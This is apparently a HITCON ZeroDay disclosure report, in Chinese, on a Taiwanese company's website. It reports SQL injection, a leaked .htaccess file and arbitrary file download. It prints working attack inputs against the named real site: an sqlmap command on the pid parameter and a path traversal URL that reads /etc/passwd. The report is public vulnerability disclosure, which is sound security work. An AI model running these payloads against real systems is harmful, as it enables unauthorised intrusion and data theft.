Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-01053
- Vendor: 水礦科技股份有限公司
- Title: 水礦科技股份有限公司 SQL注入,.htaccess洩漏與任意檔案下載
- Introduction: SQL注入,.htaccess洩漏與任意檔案下載
處理狀態
目前狀態
公開
Last Update : 2024/11/08
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2024/09/08 02:16:19 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/09/09 17:57:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/10 23:29:12 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/10 23:29:12 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/09/10 23:29:12 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/11/08 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-01053
- 通報者:nhd1261 ({{萌新}})
- 風險:嚴重
- 類型:任意檔案下載 (Arbitrary File Download)
參考資料
攻擊者可經由該漏洞取得後端系統中的任意資料(包含主機之敏感檔案)。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
SQL注入
https://www.aqualab.com.tw/prod.php?pid=70
.htaccess洩漏
https://www.aqualab.com.tw/.htaccess
任意檔案下載
https://www.aqualab.com.tw/download.php?path=./uploads/file/&filename=../../../../etc/passwd
https://www.aqualab.com.tw/prod.php?pid=70
.htaccess洩漏
https://www.aqualab.com.tw/.htaccess
任意檔案下載
https://www.aqualab.com.tw/download.php?path=./uploads/file/&filename=../../../../etc/passwd
敘述
透過SQLmap對pid參數測試,成功注入。
Payload:
python sqlmap.py "https://www.aqualab.com.tw/prod.php?pid=70" --time-sec=10 --threads 10 --random-agent --dbs --batch
發現可透過https://www.aqualab.com.tw/.htaccess下載.htaccess檔案
發現可透過https://www.aqualab.com.tw/download.php?path=./uploads/file/&filename=[檔案路徑] 下載任意檔案
透過以下Payload成功下載到/etc/passwd
https://www.aqualab.com.tw/download.php?path=./uploads/file/&filename=../../../../etc/passwd
所有獲得檔案測試完畢後皆以刪除
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。